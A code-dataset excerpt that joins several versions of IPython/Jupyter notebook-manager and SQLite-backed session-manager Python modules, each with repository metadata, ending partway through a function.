return sign.NotebookNotary(parent=self)
hide_globs = List(Unicode, [u'__pycache__'], config=True, help="""
Glob patterns to hide in file and directory listings.
""")
# NotebookManager API part 1: methods that must be
# implemented in subclasses.
def path_exists(self, path):
"""Does the API-style path (directory) actually exist?
Override this method in subclasses.
Parameters
----------
path : string
The path to check
Returns
-------
exists : bool
Whether the path does indeed exist.
"""
raise NotImplementedError
def is_hidden(self, path):
"""Does the API style path correspond to a hidden directory or file?
Parameters
----------
path : string
The path to check. This is an API path (`/` separated,
relative to base notebook-dir).
Returns
-------
exists : bool
Whether the path is hidden.
"""
raise NotImplementedError
def notebook_exists(self, name, path=''):
"""Returns a True if the notebook exists. Else, returns False.
Parameters
----------
name : string
The name of the notebook you are checking.
path : string
The relative path to the notebook (with '/' as separator)
Returns
-------
bool
"""
raise NotImplementedError('must be implemented in a subclass')
# TODO: Remove this after we create the contents web service and directories are
# no longer listed by the notebook web service.
def list_dirs(self, path):
"""List the directory models for a given API style path."""
raise NotImplementedError('must be implemented in a subclass')
# TODO: Remove this after we create the contents web service and directories are
# no longer listed by the notebook web service.
def get_dir_model(self, name, path=''):
"""Get the directory model given a directory name and its API style path.
The keys in the model should be:
* name
* path
* last_modified
* created
* type='directory'
"""
raise NotImplementedError('must be implemented in a subclass')
def list_notebooks(self, path=''):
"""Return a list of notebook dicts without content.
This returns a list of dicts, each of the form::
dict(notebook_id=notebook,name=name)
This list of dicts should be sorted by name::
data = sorted(data, key=lambda item: item['name'])
"""
raise NotImplementedError('must be implemented in a subclass')
def get_notebook(self, name, path='', content=True):
"""Get the notebook model with or without content."""
raise NotImplementedError('must be implemented in a subclass')
def save_notebook(self, model, name, path=''):
"""Save the notebook and return the model with no content."""
raise NotImplementedError('must be implemented in a subclass')
def update_notebook(self, model, name, path=''):
"""Update the notebook and return the model with no content."""
raise NotImplementedError('must be implemented in a subclass')
def delete_notebook(self, name, path=''):
"""Delete notebook by name and path."""
raise NotImplementedError('must be implemented in a subclass')
def create_checkpoint(self, name, path=''):
"""Create a checkpoint of the current state of a notebook
Returns a checkpoint_id for the new checkpoint.
"""
raise NotImplementedError("must be implemented in a subclass")
def list_checkpoints(self, name, path=''):
"""Return a list of checkpoints for a given notebook"""
return []
def restore_checkpoint(self, checkpoint_id, name, path=''):
"""Restore a notebook from one of its checkpoints"""
raise NotImplementedError("must be implemented in a subclass")
def delete_checkpoint(self, checkpoint_id, name, path=''):
"""delete a checkpoint for a notebook"""
raise NotImplementedError("must be implemented in a subclass")
def info_string(self):
return "Serving notebooks"
# NotebookManager API part 2: methods that have useable default
# implementations, but can be overridden in subclasses.
def increment_filename(self, basename, path=''):
"""Increment a notebook filename without the .ipynb to make it unique.
Parameters
----------
basename : unicode
The name of a notebook without the ``.ipynb`` file extension.
path : unicode
The URL path of the notebooks directory
Returns
-------
name : unicode
A notebook name (with the .ipynb extension) that starts
with basename and does not refer to any existing notebook.
"""
path = path.strip('/')
for i in itertools.count():
name = u'{basename}{i}{ext}'.format(basename=basename, i=i,
ext=self.filename_ext)
if not self.notebook_exists(name, path):
break
return name
def create_notebook(self, model=None, path=''):
"""Create a new notebook and return its model with no content."""
path = path.strip('/')
if model is None:
model = {}
if 'content' not in model:
metadata = current.new_metadata(name=u'')
model['content'] = current.new_notebook(metadata=metadata)
if 'name' not in model:
model['name'] = self.increment_filename('Untitled', path)
model['path'] = path
model = self.save_notebook(model, model['name'], model['path'])
return model
def copy_notebook(self, from_name, to_name=None, path=''):
"""Copy an existing notebook and return its new model.
If to_name not specified, increment `from_name-Copy#.ipynb`.
"""
path = path.strip('/')
model = self.get_notebook(from_name, path)
if not to_name:
base = os.path.splitext(from_name)[0] + '-Copy'
to_name = self.increment_filename(base, path)
model['name'] = to_name
model = self.save_notebook(model, to_name, path)
return model
def log_info(self):
self.log.info(self.info_string())
def trust_notebook(self, name, path=''):
"""Explicitly trust a notebook
Parameters
----------
name : string
The filename of the notebook
path : string
The notebook's directory
"""
model = self.get_notebook(name, path)
nb = model['content']
self.log.warn("Trusting notebook %s/%s", path, name)
self.notary.mark_cells(nb, True)
self.save_notebook(model, name, path)
def check_and_sign(self, nb, name, path=''):
"""Check for trusted cells, and sign the notebook.
Called as a part of saving notebooks.
Parameters
----------
nb : dict
The notebook structure
name : string
The filename of the notebook
path : string
The notebook's directory
"""
if self.notary.check_cells(nb):
self.notary.sign(nb)
else:
self.log.warn("Saving untrusted notebook %s/%s", path, name)
def mark_trusted_cells(self, nb, name, path=''):
"""Mark cells as trusted if the notebook signature matches.
Called as a part of loading notebooks.
Parameters
----------
nb : dict
The notebook structure
name : string
The filename of the notebook
path : string
The notebook's directory
"""
trusted = self.notary.check_signature(nb)
if not trusted:
self.log.warn("Notebook %s/%s is not trusted", path, name)
self.notary.mark_cells(nb, trusted)
def should_list(self, name):
"""Should this file/directory name be displayed in a listing?"""
return not any(fnmatch(name, glob) for glob in self.hide_globs)
| {
"repo_name": "Lightmatter/django-inlineformfield",
"path": ".tox/py27/lib/python2.7/site-packages/IPython/html/services/notebooks/nbmanager.py",
"copies": "7",
"size": "9608",
"license": "mit",
"hash": -6648545500617689000,
"line_mean": 32.9505300353,
"line_max": 84,
"alpha_frac": 0.5611990008,
"autogenerated": false,
"ratio": 4.950025759917568,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9011224760717568,
"avg_score": null,
"num_lines": null
} |
"""A base class session manager.
Authors:
* Zach Sailer
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import uuid
import sqlite3
from tornado import web
from IPython.config.configurable import LoggingConfigurable
from IPython.utils.py3compat import unicode_type
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class SessionManager(LoggingConfigurable):
# Session database initialized below
_cursor = None
_connection = None
_columns = {'session_id', 'name', 'path', 'kernel_id'}
@property
def cursor(self):
"""Start a cursor and create a database called 'session'"""
if self._cursor is None:
self._cursor = self.connection.cursor()
self._cursor.execute("""CREATE TABLE session
(session_id, name, path, kernel_id)""")
return self._cursor
@property
def connection(self):
"""Start a database connection"""
if self._connection is None:
self._connection = sqlite3.connect(':memory:')
self._connection.row_factory = self.row_factory
return self._connection
def __del__(self):
"""Close connection once SessionManager closes"""
self.cursor.close()
def session_exists(self, name, path):
"""Check to see if the session for a given notebook exists"""
self.cursor.execute("SELECT * FROM session WHERE name=? AND path=?", (name, path))
reply = self.cursor.fetchone()
if reply is None:
return False
else:
return True
def new_session_id(self):
"Create a uuid for a new session"
return unicode_type(uuid.uuid4())
def create_session(self, name=None, path=None, kernel_id=None):
"""Creates a session and returns its model"""
session_id = self.new_session_id()
return self.save_session(session_id, name=name, path=path, kernel_id=kernel_id)
def save_session(self, session_id, name=None, path=None, kernel_id=None):
"""Saves the items for the session with the given session_id
Given a session_id (and any other of the arguments), this method
creates a row in the sqlite session database that holds the information
for a session.
Parameters
----------
session_id : str
uuid for the session; this method must be given a session_id
name : str
the .ipynb notebook name that started the session
path : str
the path to the named notebook
kernel_id : str
a uuid for the kernel associated with this session
Returns
-------
model : dict
a dictionary of the session model
"""
self.cursor.execute("INSERT INTO session VALUES (?,?,?,?)",
(session_id, name, path, kernel_id)
)
return self.get_session(session_id=session_id)
def get_session(self, **kwargs):
"""Returns the model for a particular session.
Takes a keyword argument and searches for the value in the session
database, then returns the rest of the session's info.
Parameters
----------
**kwargs : keyword argument
must be given one of the keywords and values from the session database
(i.e. session_id, name, path, kernel_id)
Returns
-------
model : dict
returns a dictionary that includes all the information from the
session described by the kwarg.
"""
if not kwargs:
raise TypeError("must specify a column to query")
conditions = []
for column in kwargs.keys():
if column not in self._columns:
raise TypeError("No such column: %r", column)
conditions.append("%s=?" % column)
query = "SELECT * FROM session WHERE %s" % (' AND '.join(conditions))
self.cursor.execute(query, list(kwargs.values()))
model = self.cursor.fetchone()
if model is None:
q = []
for key, value in kwargs.items():
q.append("%s=%r" % (key, value))
raise web.HTTPError(404, u'Session not found: %s' % (', '.join(q)))
return model
def update_session(self, session_id, **kwargs):
"""Updates the values in the session database.
Changes the values of the session with the given session_id
with the values from the keyword arguments.
Parameters
----------
session_id : str
a uuid that identifies a session in the sqlite3 database
**kwargs : str
the key must correspond to a column title in session database,
and the value replaces the current value in the session
with session_id.
"""
self.get_session(session_id=session_id)
if not kwargs:
# no changes
return
sets = []
for column in kwargs.keys():
if column not in self._columns:
raise TypeError("No such column: %r" % column)
sets.append("%s=?" % column)
query = "UPDATE session SET %s WHERE session_id=?" % (', '.join(sets))
self.cursor.execute(query, list(kwargs.values()) + [session_id])
@staticmethod
def row_factory(cursor, row):
"""Takes sqlite database session row and turns it into a dictionary"""
row = sqlite3.Row(cursor, row)
model = {
'id': row['session_id'],
'notebook': {
'name': row['name'],
'path': row['path']
},
'kernel': {
'id': row['kernel_id'],
}
}
return model
def list_sessions(self):
"""Returns a list of dictionaries containing all the information from
the session database"""
c = self.cursor.execute("SELECT * FROM session")
return list(c.fetchall())
def delete_session(self, session_id):
"""Deletes the row in the session database with given session_id"""
# Check that session exists before deleting
self.get_session(session_id=session_id)
self.cursor.execute("DELETE FROM session WHERE session_id=?", (session_id,))
| {
"repo_name": "omni5cience/django-inlineformfield",
"path": ".tox/py27/lib/python2.7/site-packages/IPython/html/services/sessions/sessionmanager.py",
"copies": "8",
"size": "6936",
"license": "mit",
"hash": -2603917421438935000,
"line_mean": 33.8542713568,
"line_max": 90,
"alpha_frac": 0.5415224913,
"autogenerated": false,
"ratio": 4.83008356545961,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9371606056759609,
"avg_score": null,
"num_lines": null
} |
"""A base class session manager."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import uuid
import sqlite3
from tornado import web
from IPython.config.configurable import LoggingConfigurable
from IPython.utils.py3compat import unicode_type
from IPython.utils.traitlets import Instance
class SessionManager(LoggingConfigurable):
kernel_manager = Instance(
'IPython.html.services.kernels.kernelmanager.MappingKernelManager')
contents_manager = Instance(
'IPython.html.services.contents.manager.ContentsManager', args=())
# Session database initialized below
_cursor = None
_connection = None
_columns = {'session_id', 'path', 'kernel_id'}
@property
def cursor(self):
"""Start a cursor and create a database called 'session'"""
if self._cursor is None:
self._cursor = self.connection.cursor()
self._cursor.execute("""CREATE TABLE session
(session_id, path, kernel_id)""")
return self._cursor
@property
def connection(self):
"""Start a database connection"""
if self._connection is None:
self._connection = sqlite3.connect(':memory:')
self._connection.row_factory = sqlite3.Row
return self._connection
def __del__(self):
"""Close connection once SessionManager closes"""
self.cursor.close()
def session_exists(self, path):
"""Check to see if the session for a given notebook exists"""
self.cursor.execute("SELECT * FROM session WHERE path=?", (path,))
reply = self.cursor.fetchone()
if reply is None:
return False
else:
return True
def new_session_id(self):
"Create a uuid for a new session"
return unicode_type(uuid.uuid4())
def create_session(self, path=None, kernel_name=None):
"""Creates a session and returns its model"""
session_id = self.new_session_id()
# allow nbm to specify kernels cwd
kernel_path = self.contents_manager.get_kernel_path(path=path)
kernel_id = self.kernel_manager.start_kernel(path=kernel_path,
kernel_name=kernel_name)
return self.save_session(session_id, path=path,
kernel_id=kernel_id)
def save_session(self, session_id, path=None, kernel_id=None):
"""Saves the items for the session with the given session_id
Given a session_id (and any other of the arguments), this method
creates a row in the sqlite session database that holds the information
for a session.
Parameters
----------
session_id : str
uuid for the session; this method must be given a session_id
path : str
the path for the given notebook
kernel_id : str
a uuid for the kernel associated with this session
Returns
-------
model : dict
a dictionary of the session model
"""
self.cursor.execute("INSERT INTO session VALUES (?,?,?)",
(session_id, path, kernel_id)
)
return self.get_session(session_id=session_id)
def get_session(self, **kwargs):
"""Returns the model for a particular session.
Takes a keyword argument and searches for the value in the session
database, then returns the rest of the session's info.
Parameters
----------
**kwargs : keyword argument
must be given one of the keywords and values from the session database
(i.e. session_id, path, kernel_id)
Returns
-------
model : dict
returns a dictionary that includes all the information from the
session described by the kwarg.
"""
if not kwargs:
raise TypeError("must specify a column to query")
conditions = []
for column in kwargs.keys():
if column not in self._columns:
raise TypeError("No such column: %r", column)
conditions.append("%s=?" % column)
query = "SELECT * FROM session WHERE %s" % (' AND '.join(conditions))
self.cursor.execute(query, list(kwargs.values()))
try:
row = self.cursor.fetchone()
except KeyError:
# The kernel is missing, so the session just got deleted.
row = None
if row is None:
q = []
for key, value in kwargs.items():
q.append("%s=%r" % (key, value))
raise web.HTTPError(404, u'Session not found: %s' % (', '.join(q)))
return self.row_to_model(row)
def update_session(self, session_id, **kwargs):
"""Updates the values in the session database.
Changes the values of the session with the given session_id
with the values from the keyword arguments.
Parameters
----------
session_id : str
a uuid that identifies a session in the sqlite3 database
**kwargs : str
the key must correspond to a column title in session database,
and the value replaces the current value in the session
with session_id.
"""
self.get_session(session_id=session_id)
if not kwargs:
# no changes
return
sets = []
for column in kwargs.keys():
if column not in self._columns:
raise TypeError("No such column: %r" % column)
sets.append("%s=?" % column)
query = "UPDATE session SET %s WHERE session_id=?" % (', '.join(sets))
self.cursor.execute(query, list(kwargs.values()) + [session_id])
def row_to_model(self, row):
"""Takes sqlite database session row and turns it into a dictionary"""
if row['kernel_id'] not in self.kernel_manager:
# The kernel was killed or died without deleting the session.
# We can't use delete_session here because that tries to find
# and shut down the kernel.
self.cursor.execute("DELETE FROM session WHERE session_id=?",
(row['session_id'],))
raise KeyError
model = {
'id': row['session_id'],
'notebook': {
'path': row['path']
},
'kernel': self.kernel_manager.kernel_model(row['kernel_id'])
}
return model
def list_sessions(self):
"""Returns a list of dictionaries containing all the information from
the session database"""
c = self.cursor.execute("SELECT * FROM session")
result = []
# We need to use fetchall() here, because row_to_model can delete rows,
# which messes up the cursor if we're iterating over rows.
for row in c.fetchall():
try:
result.append(self.row_to_model(row))
except KeyError:
pass
return result
def delete_session(self, session_id):
"""Deletes the row in the session database with given session_id"""
# Check that session exists before deleting
session = self.get_session(session_id=session_id)
self.kernel_manager.shutdown_kernel(session['kernel']['id'])
self.cursor.execute(
"DELETE FROM session WHERE session_id=?", (session_id,))
| {
"repo_name": "mattvonrocketstein/smash",
"path": "smashlib/ipy3x/html/services/sessions/sessionmanager.py",
"copies": "1",
"size": "7542",
"license": "mit",
"hash": 2309167377603177500,
"line_mean": 34.7440758294,
"line_max": 82,
"alpha_frac": 0.5831344471,
"autogenerated": false,
"ratio": 4.607208307880269,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5690342754980269,
"avg_score": null,
"num_lines": null
} |
"""A base class session manager."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import os
import uuid
try:
import sqlite3
except ImportError:
# fallback on pysqlite2 if Python was build without sqlite
from pysqlite2 import dbapi2 as sqlite3
from tornado import gen, web
from traitlets.config.configurable import LoggingConfigurable
from ipython_genutils.py3compat import unicode_type
from traitlets import Instance
class SessionManager(LoggingConfigurable):
kernel_manager = Instance('notebook.services.kernels.kernelmanager.MappingKernelManager')
contents_manager = Instance('notebook.services.contents.manager.ContentsManager')
# Session database initialized below
_cursor = None
_connection = None
_columns = {'session_id', 'path', 'name', 'type', 'kernel_id'}
@property
def cursor(self):
"""Start a cursor and create a database called 'session'"""
if self._cursor is None:
self._cursor = self.connection.cursor()
self._cursor.execute("""CREATE TABLE session
(session_id, path, name, type, kernel_id)""")
return self._cursor
@property
def connection(self):
"""Start a database connection"""
if self._connection is None:
self._connection = sqlite3.connect(':memory:')
self._connection.row_factory = sqlite3.Row
return self._connection
def close(self):
"""Close the sqlite connection"""
if self._cursor is not None:
self._cursor.close()
self._cursor = None
def __del__(self):
"""Close connection once SessionManager closes"""
self.close()
def session_exists(self, path):
"""Check to see if the session of a given name exists"""
self.cursor.execute("SELECT * FROM session WHERE path=?", (path,))
reply = self.cursor.fetchone()
if reply is None:
return False
else:
return True
def new_session_id(self):
"Create a uuid for a new session"
return unicode_type(uuid.uuid4())
@gen.coroutine
def create_session(self, path=None, name=None, type=None, kernel_name=None, kernel_id=None):
"""Creates a session and returns its model"""
session_id = self.new_session_id()
if kernel_id is not None and kernel_id in self.kernel_manager:
pass
else:
kernel_id = yield self.start_kernel_for_session(session_id, path, name, type, kernel_name)
result = yield gen.maybe_future(
self.save_session(session_id, path=path, name=name, type=type, kernel_id=kernel_id)
)
# py2-compat
raise gen.Return(result)
@gen.coroutine
def start_kernel_for_session(self, session_id, path, name, type, kernel_name):
"""Start a new kernel for a given session."""
# allow contents manager to specify kernels cwd
kernel_path = self.contents_manager.get_kernel_path(path=path)
kernel_id = yield gen.maybe_future(
self.kernel_manager.start_kernel(path=kernel_path, kernel_name=kernel_name)
)
# py2-compat
raise gen.Return(kernel_id)
def save_session(self, session_id, path=None, name=None, type=None, kernel_id=None):
"""Saves the items for the session with the given session_id
Given a session_id (and any other of the arguments), this method
creates a row in the sqlite session database that holds the information
for a session.
Parameters
----------
session_id : str
uuid for the session; this method must be given a session_id
path : str
the path for the given session
name: str
the name of the session
type: string
the type of the session
kernel_id : str
a uuid for the kernel associated with this session
Returns
-------
model : dict
a dictionary of the session model
"""
self.cursor.execute("INSERT INTO session VALUES (?,?,?,?,?)",
(session_id, path, name, type, kernel_id)
)
return self.get_session(session_id=session_id)
def get_session(self, **kwargs):
"""Returns the model for a particular session.
Takes a keyword argument and searches for the value in the session
database, then returns the rest of the session's info.
Parameters
----------
**kwargs : keyword argument
must be given one of the keywords and values from the session database
(i.e. session_id, path, name, type, kernel_id)
Returns
-------
model : dict
returns a dictionary that includes all the information from the
session described by the kwarg.
"""
if not kwargs:
raise TypeError("must specify a column to query")
conditions = []
for column in kwargs.keys():
if column not in self._columns:
raise TypeError("No such column: %r", column)
conditions.append("%s=?" % column)
query = "SELECT * FROM session WHERE %s" % (' AND '.join(conditions))
self.cursor.execute(query, list(kwargs.values()))
try:
row = self.cursor.fetchone()
except KeyError:
# The kernel is missing, so the session just got deleted.
row = None
if row is None:
q = []
for key, value in kwargs.items():
q.append("%s=%r" % (key, value))
raise web.HTTPError(404, u'Session not found: %s' % (', '.join(q)))
return self.row_to_model(row)
def update_session(self, session_id, **kwargs):
"""Updates the values in the session database.
Changes the values of the session with the given session_id
with the values from the keyword arguments.
Parameters
----------
session_id : str
a uuid that identifies a session in the sqlite3 database
**kwargs : str
the key must correspond to a column title in session database,
and the value replaces the current value in the session
with session_id.
"""
self.get_session(session_id=session_id)
if not kwargs:
# no changes
return
sets = []
for column in kwargs.keys():
if column not in self._columns:
raise TypeError("No such column: %r" % column)
sets.append("%s=?" % column)
query = "UPDATE session SET %s WHERE session_id=?" % (', '.join(sets))
self.cursor.execute(query, list(kwargs.values()) + [session_id])
def row_to_model(self, row):
"""Takes sqlite database session row and turns it into a dictionary"""
if row['kernel_id'] not in self.kernel_manager:
# The kernel was killed or died without deleting the session.
# We can't use delete_session here because that tries to find
# and shut down the kernel.
self.cursor.execute("DELETE FROM session WHERE session_id=?",
(row['session_id'],))
raise KeyError
model = {
'id': row['session_id'],
'path': row['path'],
'name': row['name'],
'type': row['type'],
'kernel': self.kernel_manager.kernel_model(row['kernel_id'])
}
if row['type'] == 'notebook':
# Provide the deprecated API.
model['notebook'] = {'path': row['path'], 'name': row['name']}
return model
def list_sessions(self):
"""Returns a list of dictionaries containing all the information from
the session database"""
c = self.cursor.execute("SELECT * FROM session")
result = []
# We need to use fetchall() here, because row_to_model can delete rows,
# which messes up the cursor if we're iterating over rows.
for row in c.fetchall():
try:
result.append(self.row_to_model(row))
except KeyError:
pass
return result
@gen.coroutine
def delete_session(self, session_id):
"""Deletes the row in the session database with given session_id"""
session = self.get_session(session_id=session_id)
yield gen.maybe_future(self.kernel_manager.shutdown_kernel(session['kernel']['id']))
self.cursor.execute("DELETE FROM session WHERE session_id=?", (session_id,))
| {
"repo_name": "nitin-cherian/LifeLongLearning",
"path": "Python/PythonProgrammingLanguage/Encapsulation/encap_env/lib/python3.5/site-packages/notebook/services/sessions/sessionmanager.py",
"copies": "5",
"size": "8745",
"license": "mit",
"hash": 2121340985598367200,
"line_mean": 35.1363636364,
"line_max": 102,
"alpha_frac": 0.5887935963,
"autogenerated": false,
"ratio": 4.448118006103764,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.006132321684768975,
"num_lines": 242
} |
"""A base class session manager."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import uuid
import sqlite3
from tornado import web
from traitlets.config.configurable import LoggingConfigurable
from ipython_genutils.py3compat import unicode_type
from traitlets import Instance
class SessionManager(LoggingConfigurable):
kernel_manager = Instance('notebook.services.kernels.kernelmanager.MappingKernelManager')
contents_manager = Instance('notebook.services.contents.manager.ContentsManager')
# Session database initialized below
_cursor = None
_connection = None
_columns = {'session_id', 'path', 'kernel_id'}
@property
def cursor(self):
"""Start a cursor and create a database called 'session'"""
if self._cursor is None:
self._cursor = self.connection.cursor()
self._cursor.execute("""CREATE TABLE session
(session_id, path, kernel_id)""")
return self._cursor
@property
def connection(self):
"""Start a database connection"""
if self._connection is None:
self._connection = sqlite3.connect(':memory:')
self._connection.row_factory = sqlite3.Row
return self._connection
def __del__(self):
"""Close connection once SessionManager closes"""
self.cursor.close()
def session_exists(self, path):
"""Check to see if the session for a given notebook exists"""
self.cursor.execute("SELECT * FROM session WHERE path=?", (path,))
reply = self.cursor.fetchone()
if reply is None:
return False
else:
return True
def new_session_id(self):
"Create a uuid for a new session"
return unicode_type(uuid.uuid4())
def create_session(self, path=None, kernel_name=None):
"""Creates a session and returns its model"""
session_id = self.new_session_id()
# allow nbm to specify kernels cwd
kernel_path = self.contents_manager.get_kernel_path(path=path)
kernel_id = self.kernel_manager.start_kernel(path=kernel_path,
kernel_name=kernel_name)
return self.save_session(session_id, path=path,
kernel_id=kernel_id)
def save_session(self, session_id, path=None, kernel_id=None):
"""Saves the items for the session with the given session_id
Given a session_id (and any other of the arguments), this method
creates a row in the sqlite session database that holds the information
for a session.
Parameters
----------
session_id : str
uuid for the session; this method must be given a session_id
path : str
the path for the given notebook
kernel_id : str
a uuid for the kernel associated with this session
Returns
-------
model : dict
a dictionary of the session model
"""
self.cursor.execute("INSERT INTO session VALUES (?,?,?)",
(session_id, path, kernel_id)
)
return self.get_session(session_id=session_id)
def get_session(self, **kwargs):
"""Returns the model for a particular session.
Takes a keyword argument and searches for the value in the session
database, then returns the rest of the session's info.
Parameters
----------
**kwargs : keyword argument
must be given one of the keywords and values from the session database
(i.e. session_id, path, kernel_id)
Returns
-------
model : dict
returns a dictionary that includes all the information from the
session described by the kwarg.
"""
if not kwargs:
raise TypeError("must specify a column to query")
conditions = []
for column in kwargs.keys():
if column not in self._columns:
raise TypeError("No such column: %r", column)
conditions.append("%s=?" % column)
query = "SELECT * FROM session WHERE %s" % (' AND '.join(conditions))
self.cursor.execute(query, list(kwargs.values()))
try:
row = self.cursor.fetchone()
except KeyError:
# The kernel is missing, so the session just got deleted.
row = None
if row is None:
q = []
for key, value in kwargs.items():
q.append("%s=%r" % (key, value))
raise web.HTTPError(404, u'Session not found: %s' % (', '.join(q)))
return self.row_to_model(row)
def update_session(self, session_id, **kwargs):
"""Updates the values in the session database.
Changes the values of the session with the given session_id
with the values from the keyword arguments.
Parameters
----------
session_id : str
a uuid that identifies a session in the sqlite3 database
**kwargs : str
the key must correspond to a column title in session database,
and the value replaces the current value in the session
with session_id.
"""
self.get_session(session_id=session_id)
if not kwargs:
# no changes
return
sets = []
for column in kwargs.keys():
if column not in self._columns:
raise TypeError("No such column: %r" % column)
sets.append("%s=?" % column)
query = "UPDATE session SET %s WHERE session_id=?" % (', '.join(sets))
self.cursor.execute(query, list(kwargs.values()) + [session_id])
def row_to_model(self, row):
"""Takes sqlite database session row and turns it into a dictionary"""
if row['kernel_id'] not in self.kernel_manager:
# The kernel was killed or died without deleting the session.
# We can't use delete_session here because that tries to find
# and shut down the kernel.
self.cursor.execute("DELETE FROM session WHERE session_id=?",
(row['session_id'],))
raise KeyError
model = {
'id': row['session_id'],
'notebook': {
'path': row['path']
},
'kernel': self.kernel_manager.kernel_model(row['kernel_id'])
}
return model
def list_sessions(self):
"""Returns a list of dictionaries containing all the information from
the session database"""
c = self.cursor.execute("SELECT * FROM session")
result = []
# We need to use fetchall() here, because row_to_model can delete rows,
# which messes up the cursor if we're iterating over rows.
for row in c.fetchall():
try:
result.append(self.row_to_model(row))
except KeyError:
pass
return result
def delete_session(self, session_id):
"""Deletes the row in the session database with given session_id"""
# Check that session exists before deleting
session = self.get_session(session_id=session_id)
self.kernel_manager.shutdown_kernel(session['kernel']['id'])
self.cursor.execute("DELETE FROM session WHERE session_id=?", (session_id,))
| {
"repo_name": "bdh1011/wau",
"path": "venv/lib/python2.7/site-packages/notebook/services/sessions/sessionmanager.py",
"copies": "1",
"size": "7514",
"license": "mit",
"hash": 4386023095671664600,
"line_mean": 35.125,
"line_max": 93,
"alpha_frac": 0.5830449827,
"autogenerated": false,
"ratio": 4.621156211562115,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5704201194262115,
"avg_score": null,
"num_lines": null
} |
"""A base class session manager."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import uuid
try:
import sqlite3
except ImportError:
# fallback on pysqlite2 if Python was build without sqlite
from pysqlite2 import dbapi2 as sqlite3
from tornado import gen, web
from traitlets.config.configurable import LoggingConfigurable
from ipython_genutils.py3compat import unicode_type
from traitlets import Instance
from notebook.utils import maybe_future
class SessionManager(LoggingConfigurable):
kernel_manager = Instance('notebook.services.kernels.kernelmanager.MappingKernelManager')
contents_manager = Instance('notebook.services.contents.manager.ContentsManager')
# Session database initialized below
_cursor = None
_connection = None
_columns = {'session_id', 'path', 'name', 'type', 'kernel_id'}
@property
def cursor(self):
"""Start a cursor and create a database called 'session'"""
if self._cursor is None:
self._cursor = self.connection.cursor()
self._cursor.execute("""CREATE TABLE session
(session_id, path, name, type, kernel_id)""")
return self._cursor
@property
def connection(self):
"""Start a database connection"""
if self._connection is None:
self._connection = sqlite3.connect(':memory:')
self._connection.row_factory = sqlite3.Row
return self._connection
def close(self):
"""Close the sqlite connection"""
if self._cursor is not None:
self._cursor.close()
self._cursor = None
def __del__(self):
"""Close connection once SessionManager closes"""
self.close()
@gen.coroutine
def session_exists(self, path):
"""Check to see if the session of a given name exists"""
exists = False
self.cursor.execute("SELECT * FROM session WHERE path=?", (path,))
row = self.cursor.fetchone()
if row is not None:
# Note, although we found a row for the session, the associated kernel may have
# been culled or died unexpectedly. If that's the case, we should delete the
# row, thereby terminating the session. This can be done via a call to
# row_to_model that tolerates that condition. If row_to_model returns None,
# we'll return false, since, at that point, the session doesn't exist anyway.
model = yield maybe_future(self.row_to_model(row, tolerate_culled=True))
if model is not None:
exists = True
raise gen.Return(exists)
def new_session_id(self):
"Create a uuid for a new session"
return unicode_type(uuid.uuid4())
@gen.coroutine
def create_session(self, path=None, name=None, type=None, kernel_name=None, kernel_id=None):
"""Creates a session and returns its model"""
session_id = self.new_session_id()
if kernel_id is not None and kernel_id in self.kernel_manager:
pass
else:
kernel_id = yield self.start_kernel_for_session(session_id, path, name, type, kernel_name)
result = yield maybe_future(
self.save_session(session_id, path=path, name=name, type=type, kernel_id=kernel_id)
)
# py2-compat
raise gen.Return(result)
@gen.coroutine
def start_kernel_for_session(self, session_id, path, name, type, kernel_name):
"""Start a new kernel for a given session."""
# allow contents manager to specify kernels cwd
kernel_path = self.contents_manager.get_kernel_path(path=path)
kernel_id = yield maybe_future(
self.kernel_manager.start_kernel(path=kernel_path, kernel_name=kernel_name)
)
# py2-compat
raise gen.Return(kernel_id)
@gen.coroutine
def save_session(self, session_id, path=None, name=None, type=None, kernel_id=None):
"""Saves the items for the session with the given session_id
Given a session_id (and any other of the arguments), this method
creates a row in the sqlite session database that holds the information
for a session.
Parameters
----------
session_id : str
uuid for the session; this method must be given a session_id
path : str
the path for the given session
name: str
the name of the session
type: string
the type of the session
kernel_id : str
a uuid for the kernel associated with this session
Returns
-------
model : dict
a dictionary of the session model
"""
self.cursor.execute("INSERT INTO session VALUES (?,?,?,?,?)",
(session_id, path, name, type, kernel_id)
)
result = yield maybe_future(self.get_session(session_id=session_id))
raise gen.Return(result)
@gen.coroutine
def get_session(self, **kwargs):
"""Returns the model for a particular session.
Takes a keyword argument and searches for the value in the session
database, then returns the rest of the session's info.
Parameters
----------
**kwargs : keyword argument
must be given one of the keywords and values from the session database
(i.e. session_id, path, name, type, kernel_id)
Returns
-------
model : dict
returns a dictionary that includes all the information from the
session described by the kwarg.
"""
if not kwargs:
raise TypeError("must specify a column to query")
conditions = []
for column in kwargs.keys():
if column not in self._columns:
raise TypeError("No such column: %r", column)
conditions.append("%s=?" % column)
query = "SELECT * FROM session WHERE %s" % (' AND '.join(conditions))
self.cursor.execute(query, list(kwargs.values()))
try:
row = self.cursor.fetchone()
except KeyError:
# The kernel is missing, so the session just got deleted.
row = None
if row is None:
q = []
for key, value in kwargs.items():
q.append("%s=%r" % (key, value))
raise web.HTTPError(404, u'Session not found: %s' % (', '.join(q)))
model = yield maybe_future(self.row_to_model(row))
raise gen.Return(model)
@gen.coroutine
def update_session(self, session_id, **kwargs):
"""Updates the values in the session database.
Changes the values of the session with the given session_id
with the values from the keyword arguments.
Parameters
----------
session_id : str
a uuid that identifies a session in the sqlite3 database
**kwargs : str
the key must correspond to a column title in session database,
and the value replaces the current value in the session
with session_id.
"""
yield maybe_future(self.get_session(session_id=session_id))
if not kwargs:
# no changes
return
sets = []
